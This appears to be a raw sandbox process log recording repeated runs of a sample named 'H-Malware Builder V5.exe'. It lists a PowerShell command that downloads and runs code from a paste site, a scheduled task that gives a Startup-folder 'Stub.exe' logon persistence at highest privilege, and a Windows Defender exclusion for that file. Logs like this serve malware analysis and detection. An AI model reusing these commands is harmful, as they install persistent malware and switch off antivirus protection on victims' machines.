C:\Windows\System32\dllhost.exe /Processid:{2310cd9c-15d2-4b88-a8ed-14d0ccd5d1b1}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{740b4f08-06cf-4294-87b5-8f0fe1e1f57a}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2087676489339879264-1169753059-18125351536154226-1994078599-1997952109728018215"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a35b5078-7b7c-4b44-964b-f267d38dc117}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1865670279-1240211355435769847-1203041581022877003-996365095-1644369456734126201"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2661699611046050129-1058606379-1983136055379924222209171868514846990337652463"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3d57c5a9-c5f5-4aae-995f-5bfbd31a79c4}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{95e0a682-510a-4a2f-9391-b75b547e8299}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "514871346-731776826-1899487008945581581646472481146772137627917404-2137866475"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{14057d92-4134-42cd-9f9c-ffd41585f978}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{420b2da5-6cb0-4972-a62a-dd7e5c1fc99d}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{cc077a7a-4c87-4ff4-960e-94f05d8bd47c}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{45129db5-dc2f-4bf1-9439-cd7a230e6e52}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-3758162852124014533-373065555-2103267526-144762010417700574841116986986-608347837"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{fa7eb933-1d38-46be-8ec2-7c3fc4d3862f}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{318f0c5d-41c0-4ba0-bf24-a46d974b2039}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "705666293-245080221681799987-124701558485829771798374253352083808-490427064"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{93fac4d0-049d-4485-bee5-c0e955939cb9}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{1dbe4f64-8a2d-436e-8a8c-59f2368d2eaa}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{c27c4967-f64b-4563-ae8b-9740f70871e8}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1121423432-50840839661544309-1710175127-2077003203-999313312-603799109-846385290"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{049511e8-e46a-4c19-b1c6-897ed29b3e3b}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "635167627-17080373767285125292086071969-1217392654-1512151085-937415599-486145282"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{4bfeec20-46f9-49a9-a63c-08d41174259d}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-491960003244177076-121763515919111580736519693971727148598913792924422635901"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ed1453cb-852e-4884-a9ab-71df54dc0a64}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-6342109241466957290-360005485-343090638-331268889181025871-18779670991200740944"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{b7007752-5b45-478c-8c91-0bfa4995734b}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{02f902a9-0a61-4a40-bdae-594a162835d1}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "19009838131843153552-1842022178-2014224042-991290985-1983385610838142633-577580854"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
